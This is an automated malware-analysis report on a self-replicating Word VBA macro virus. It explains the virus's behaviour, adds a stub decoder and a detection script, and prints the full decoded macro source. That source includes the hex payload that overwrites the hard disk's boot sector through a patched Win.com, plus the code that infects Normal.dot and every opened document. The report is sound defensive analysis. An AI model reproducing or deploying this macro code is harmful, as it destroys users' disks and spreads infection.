Verdict: MALICIOUS
Risk score: 80
Malware Insights
MITRE ATT&CK: T1059.005 Command and Scripting Interpreter: Visual Basic
The sample is a Word 97 VBA macro virus. The decoded project holds an empty ThisDocument stream and a module named ET_No1 whose AutoOpen procedure runs whenever the document is opened; a leftover VB_Invoke_Func attribute naming "ProVirus.Virus.AutoOpen" is a remnant of the author's original project. The OLE_LEGACY_WORDBASIC_AUTOEXEC heuristic also fired, but its "no modern VBA project was recovered" condition does not hold here: olevba recovered the VBA project (module streams Macros/VBA/ThisDocument and Macros/VBA/ET_No1, see macros.bas below), so the code is VBA, not WordBasic.

Behaviour on open. The macro first sets Options.VirusProtection = False, switching off Word's macro-virus warning. On the 17th of any month it opens %windir%\Win.com, the Windows 3.x/9x loader, for binary write and patches it in place from two hard-coded hex strings: a 3-byte near jump (E9 FD 09) over the first bytes of the file, whose target (0100h + 3 + 09FDh = 0B00h, file offset 2560) is exactly where the 17-byte stub is written. The stub loads AX=0301h, BX=8000h, CX=0001h, DX=0080h and issues INT 13h, a BIOS write of one sector to cylinder 0, head 0, sector 1 of the first hard disk (the MBR and partition table) from whatever ES:8000h happens to hold, then jumps back into the rest of the file. The macro immediately calls ExitWindowsEx(6, 0), uFlags EWX_REBOOT Or EWX_FORCE, so the patched Win.com executes at the next boot.

Replication and tampering. A button captioned "ETKill" in the first slot of the "Visual Basic" command bar serves as the infection marker. If it is absent, the macro deletes any existing ET_No1 module from Normal.dot and copies its own module in with Application.OrganizerCopy, then calls DelTools, which removes the Tools > Macro and Tools > Customize menu items (the captions are GBK-encoded Chinese, 宏 and 自定义, so the sample targets Simplified Chinese Word) and re-arms itself every second via Application.OnTime; it also disables the Alt+F8 (Macros) and Alt+F11 (Visual Basic Editor) key bindings, empties the Visual Basic toolbar, adds the ETKill marker button and saves Normal.dot. If the marker is already present, Normal.dot is infected and the macro instead copies ET_No1 from Normal.dot into the active document and saves it, so every document opened becomes a carrier. The OrganizerDelete call is not self-removal; it only clears a stale copy before the module is re-copied in.
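The jump arithmetic and the INT 13h register decode described above, worked through in Python as an added example for this report (not code from the sample, from oletools or from the analyzer). TXT1 and TXT2 are the macro's own hex literals; the COM load address 0100h, the file offsets implied by the VBA Put statements and the small opcode decoder are this example's reconstruction.

```python
"""Reconstruct the Win.com patch planted by the ET_No1 AutoOpen macro and
decode the 16-bit stub it contains.

Added example for this report; not code from the sample, from oletools or
from the analyzer. TXT1/TXT2 are the macro's own hex literals. The COM load
address, the file offsets derived from the VBA Put statements and the tiny
opcode decoder are this example's reconstruction."""
import struct

TXT1 = "E9FD09"                                # written at file offset 0 (Put #1, , DD)
TXT2 = "B80103BB0080B90100BA8000CD13E9FC04"    # written at 1-based positions 2561..2577
COM_BASE = 0x100        # a .com image is loaded and entered at CS:0100h
STUB_OFFSET = 2560      # Put #1, 2560 + i with i = 1 -> position 2561 -> zero-based offset 2560

REG16 = {0xB8: "ax", 0xB9: "cx", 0xBA: "dx", 0xBB: "bx"}   # MOV r16, imm16 opcodes used


def disassemble(code, ip):
    """Decode only the opcodes the stub uses: MOV r16,imm16 (B8-BB), INT imm8 (CD),
    JMP rel16 (E9). Returns (ip, mnemonic, operands) tuples; anything else is emitted
    as a raw byte so a surprise in the input is visible rather than silently skipped."""
    out, pos = [], 0
    while pos < len(code):
        op = code[pos]
        if op in REG16 and pos + 3 <= len(code):
            out.append((ip, "mov", (REG16[op], struct.unpack_from("<H", code, pos + 1)[0])))
            step = 3
        elif op == 0xCD and pos + 2 <= len(code):
            out.append((ip, "int", (code[pos + 1],)))
            step = 2
        elif op == 0xE9 and pos + 3 <= len(code):
            rel = struct.unpack_from("<h", code, pos + 1)[0]
            out.append((ip, "jmp", ((ip + 3 + rel) & 0xFFFF,)))   # relative to the next instruction
            step = 3
        else:
            out.append((ip, "db", (op,)))
            step = 1
        pos += step
        ip += step
    return out


def simulate(instrs):
    """Track the registers an INT 13h call consumes and report the disk operation."""
    regs, int13, tail_jmp = {}, None, None
    for _, mnem, ops in instrs:
        if mnem == "mov":
            regs[ops[0]] = ops[1]
        elif mnem == "int" and ops[0] == 0x13:
            ax, bx, cx, dx = (regs.get(r, 0) for r in ("ax", "bx", "cx", "dx"))
            int13 = {
                "ah": ax >> 8,                                  # 02h read, 03h write sectors
                "count": ax & 0xFF,                             # sectors to transfer
                "buffer": bx,                                   # ES:BX data buffer
                "cylinder": ((cx & 0xC0) << 2) | (cx >> 8),     # CH plus the high bits of CL
                "sector": cx & 0x3F,                            # 1-based sector number
                "head": dx >> 8,
                "drive": dx & 0xFF,                             # 80h = first hard disk
            }
        elif mnem == "jmp":
            tail_jmp = ops[0]
    return int13, tail_jmp


def analyze():
    head = disassemble(bytes.fromhex(TXT1), COM_BASE)
    stub = disassemble(bytes.fromhex(TXT2), COM_BASE + STUB_OFFSET)
    int13, tail = simulate(stub)
    return {
        "head_jmp_target_offset": head[0][2][0] - COM_BASE,   # must equal STUB_OFFSET
        "int13": int13,
        "tail_jmp_target_offset": tail - COM_BASE,            # back into the rest of Win.com
        "is_mbr_write": bool(int13) and int13["ah"] == 0x03 and int13["drive"] == 0x80
                        and (int13["cylinder"], int13["head"], int13["sector"]) == (0, 0, 1),
        "listing": head + stub,
    }


if __name__ == "__main__":
    result = analyze()
    for ip, mnem, ops in result["listing"]:
        rendered = ", ".join(o if isinstance(o, str) else f"{o:#x}" for o in ops)
        print(f"{ip:04X}: {mnem} {rendered}")
    print(result["int13"], "MBR write:", result["is_mbr_write"])
```

Running it prints the seven-instruction listing and confirms two things the summary asserts: the head jump lands exactly on offset 2560 where the stub is written, and the stub's INT 13h is a one-sector write to drive 80h at C/H/S 0/0/1. The tail jump resolves to 100Dh (file offset 3853), back inside the original Win.com image.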
Heuristics (3)
- VBA macros detected (medium, 1 related finding): OLE_VBA_MACROS. Document contains VBA macro code.
- AutoOpen macro (high): OLE_VBA_AUTOOPEN. AutoOpen macro.
- Legacy WordBasic auto-exec macro marker (medium): OLE_LEGACY_WORDBASIC_AUTOEXEC. OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
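The three heuristics above are generic (VBA present, an AutoOpen procedure, a legacy marker). When triaging olevba output an analyst also wants the behaviours specific to a self-replicating Word macro virus flagged: protection switched off, a module copied into Normal.dot via the Organizer, editor shortcuts and menu items removed, a Sub that re-arms itself with OnTime. The script below is an added example for this report, not part of oletools or of the analyzer; the indicator names, severities and verdict threshold are its own choices, and SAMPLE is a trimmed excerpt of the ET_No1 module used as constructed test input.

```python
"""Rule-based triage of decoded VBA for Word macro-virus behaviour.

Added example for this report, written against the ET_No1 module; it is not
part of oletools or of the analyzer. Input is decoded VBA text such as the
macros.bas artifact. Indicator names, severities and the verdict threshold
are this example's own choices."""
import re

# (name, severity, pattern); VBA is case-insensitive, so every pattern is matched that way.
INDICATORS = [
    ("macro_protection_disabled", "high", r"Options\.VirusProtection\s*=\s*False"),
    ("module_copied_via_organizer", "high", r"OrganizerCopy\b.*wdOrganizerObjectProjectItems"),
    ("normal_template_saved", "high", r"NormalTemplate\.Save\b"),
    ("binary_write_to_file", "high", r"\bOpen\s+.*\bFor\s+Binary\s+Access\s+Write\b"),
    ("vbe_shortcut_disabled", "medium", r"FindKey\(BuildKeyCode\(wdKey(?:F8|F11),\s*wdKeyAlt\)\)\.Disable"),
    ("menu_control_deleted", "medium", r'CommandBars\(\s*"[^"]*"\s*\)\.Controls\([^)]*\)\.Delete'),
    ("exitwindowsex_declared", "medium", r"Declare\s+Function\s+ExitWindowsEx\b"),
]

EWX_FLAGS = {1: "EWX_SHUTDOWN", 2: "EWX_REBOOT", 4: "EWX_FORCE", 8: "EWX_POWEROFF"}


def decode_ewx(flags):
    """Name the bits of an ExitWindowsEx uFlags literal; 0 on its own is EWX_LOGOFF."""
    return [name for bit, name in EWX_FLAGS.items() if flags & bit] or ["EWX_LOGOFF"]


def self_rescheduling_subs(src):
    """Subs that re-arm themselves with Application.OnTime Name:="<own name>", the
    watchdog pattern DelTools uses to keep the menu items deleted."""
    sub_re = re.compile(r"^\s*(?:Private\s+|Public\s+)?Sub\s+(\w+)\s*\([^\n]*\n(.*?)^\s*End\s+Sub\b",
                        re.I | re.M | re.S)
    found = []
    for m in sub_re.finditer(src):
        name, body = m.group(1), m.group(2)
        if re.search(r'Application\.OnTime\b.*Name:=\s*"' + re.escape(name) + '"', body, re.I):
            found.append(name)
    return found


def triage(src):
    hits = [(name, sev) for name, sev, pat in INDICATORS if re.search(pat, src, re.I)]
    report = {"hits": hits, "self_rescheduling": self_rescheduling_subs(src)}
    m = re.search(r"\bIf\s+Day\(Date\)\s*=\s*(\d+)\s+Then", src, re.I)
    report["date_trigger_day"] = int(m.group(1)) if m else None
    m = re.search(r"ExitWindowsEx\s*\(\s*(\d+)\s*,", src, re.I)
    report["exitwindows_flags"] = decode_ewx(int(m.group(1))) if m else None
    names = {n for n, _ in hits}
    # Replication into Normal.dot with the safety net switched off is the macro-virus signature.
    is_virus = ({"module_copied_via_organizer", "normal_template_saved"} <= names
                and "macro_protection_disabled" in names)
    report["verdict"] = "macro_virus" if is_virus else ("suspicious" if hits else "clean")
    return report


# Constructed test input: a trimmed excerpt of the ET_No1 module from this report.
SAMPLE = r"""
Private Declare Function ExitWindowsEx Lib "User32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long
Sub AutoOpen()
On Error Resume Next
Options.VirusProtection = False
If Day(Date) = 17 Then
Open windir + "\Win.com" For Binary Access Write Lock Read As #1
Put #1, , DD
Close #1
Call ExitWindowsEx(6, 0)
End If
Application.OrganizerCopy Source:=DocName, Destination:=DotName, Name:="ET_No1", Object:=wdOrganizerObjectProjectItems
DelTools
FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable
NormalTemplate.Save
End Sub
Sub DelTools()
For i = 1 To CommandBars("Tools").Controls.Count
CommandBars("Tools").Controls(i).Delete
Next i
Application.OnTime When:=Now + TimeValue("00:0:01"), Name:="DelTools"
End Sub
"""

if __name__ == "__main__":
    print(triage(SAMPLE))
```

Point it at the text olevba decodes (python triage.py < macros.bas, after replacing SAMPLE with sys.stdin.read()) and the report lists the indicator hits, the day-of-month trigger, the decoded ExitWindowsEx flags and any self-rescheduling Sub. The verdict rule is deliberately strict: a module copied into Normal.dot and saved, with VirusProtection turned off, is what separates a replicating macro virus from an ordinary AutoOpen macro.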
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9765 bytes | 16780812123d4b0e81f39aa0d83d7eea11fcb10e568d1e435d4cdddd5b9af9d9 |

Preview: first 1,000 lines of the extracted script (macros.bas)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "ET_No1"
Private Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Attribute GetWindowsDirectory.VB_ProcData.VB_Invoke_Func = "ProVirus.Virus.AutoOpen"
Private Declare Function ExitWindowsEx Lib "User32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long
Sub AutoOpen()
'
Dim DD As Byte
On Error Resume Next
Options.VirusProtection = False   ' [analyst note] switches off Word's macro-virus warning
If Day(Date) = 17 Then            ' [analyst note] payload trigger: the 17th of any month
Txt1 = "E9FD09"                   ' [analyst note] JMP near +09FDh, written at file offset 0, lands on offset 2560
Txt2 = "B80103BB0080B90100BA8000CD13E9FC04"   ' [analyst note] INT 13h AH=03h: write 1 sector to drive 80h, C/H/S 0/0/1 (the MBR), then JMP back
windir$ = String(144, " ")
l = GetWindowsDirectory(windir$, 144)
windir = Left(windir$, l)
Open windir + "\Win.com" For Binary Access Write Lock Read As #1   ' [analyst note] patches the existing Windows 3.x/9x loader in place; Binary mode does not truncate
For i = 1 To 3
DD = "&H" + Mid(Txt1, 2 * i - 1, 2)
Put #1, , DD
Next i
For i = 1 To 17
DD = "&H" + Mid(Txt2, 2 * i - 1, 2)
Put #1, 2560 + i, DD   ' [analyst note] 1-based position 2561.. -> zero-based offset 2560, exactly the JMP target
Next i
Close #1
Call ExitWindowsEx(6, 0)   ' [analyst note] uFlags 6 = EWX_REBOOT Or EWX_FORCE; the patched Win.com runs at the next boot
End If
DocName = ActiveDocument.Path + "\" + ActiveDocument.Name
DotName = NormalTemplate.Path + "\" + NormalTemplate.Name
If CommandBars("Visual Basic").Controls(1).Caption <> "ETKill" Then   ' [analyst note] "ETKill" button = infection marker; absent means Normal.dot is still clean
Application.OrganizerDelete Source:=DotName, Name:="ET_No1", Object:=wdOrganizerObjectProjectItems   ' [analyst note] clear any stale copy, then
Application.OrganizerCopy Source:=DocName, Destination:=DotName, Name:="ET_No1", Object:=wdOrganizerObjectProjectItems   ' [analyst note] infect Normal.dot with this module
DelTools
CustomizationContext = NormalTemplate
FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable    ' [analyst note] Alt+F8 = Macros dialog
CustomizationContext = NormalTemplate
FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable   ' [analyst note] Alt+F11 = Visual Basic Editor
For k = 1 To CommandBars("Visual Basic").Controls.Count
CommandBars("Visual Basic").Controls(1).Delete
Next k
Set MyFlag = CommandBars("Visual Basic").Controls.Add(Type:=msoControlButton, ID:=752)
MyFlag.FaceId = 30
CommandBars("Visual Basic").Controls(1).Caption = "ETKill"
NormalTemplate.Save
Else
Application.OrganizerCopy Source:=DotName, Destination:=DocName, Name:="ET_No1", Object:=wdOrganizerObjectProjectItems   ' [analyst note] Normal.dot already infected: copy the module into the opened document
ActiveDocument.Save
End If
End Sub
Sub DelTools()
For i = 1 To CommandBars("Tools").Controls.Count
If CommandBars("Tools").Controls(i).Caption = "宏(&M)" Then   ' [analyst note] GBK bytes BA EA = 宏, the Tools > Macro item of Simplified Chinese Word; olevba rendered them as Latin-1 "ºê(&M)"
CommandBars("Tools").Controls(i).Delete
Exit For
End If
Next i
For i = 1 To CommandBars("Tools").Controls.Count
If CommandBars("Tools").Controls(i).Caption = "自定义(&C)..." Then   ' [analyst note] GBK bytes D7 D4 B6 A8 D2 E5 = 自定义, the Tools > Customize item; olevba rendered them as Latin-1 "×Ô¶¨Òå(&C)..."
CommandBars("Tools").Controls(i).Delete
Exit For
End If
Next i
Application.OnTime When:=Now + TimeValue("00:0:01"), Name:="DelTools"   ' [analyst note] re-arms DelTools every second so the menu items stay deleted
End Sub
' Processing file: /opt/analyzer/scan_staging/4fce7231d25c498ea3ffccacda3e2214.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/ET_No1 - 4814 bytes
' Line #0:
' FuncDefn (Private Declare Function GetWindowsDirectory Lib "kernel32" (ByVal lpBuffer As String, ByVal nSize As Long) As Long)
' Line #1:
' FuncDefn (Private Declare Function ExitWindowsEx Lib "User32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long)
' Line #2:
' FuncDefn (Sub AutoOpen())
' Line #3:
' QuoteRem 0x0000 0x0000 ""
' Line #4:
' Dim
' VarDefn DD (As Byte)
' Line #5:
' Line #6:
' OnError (Resume Next)
' Line #7:
' Line #8:
' LitVarSpecial (False)
' Ld Options
' MemSt VirusProtection
' Line #9:
' Line #10:
' Ld Date
' ArgsLd Day 0x0001
' LitDI2 0x0011
' Eq
' IfBlock
' Line #11:
' LitStr 0x0006 "E9FD09"
' St Txt1
' Line #12:
' LitStr 0x002
... (truncated)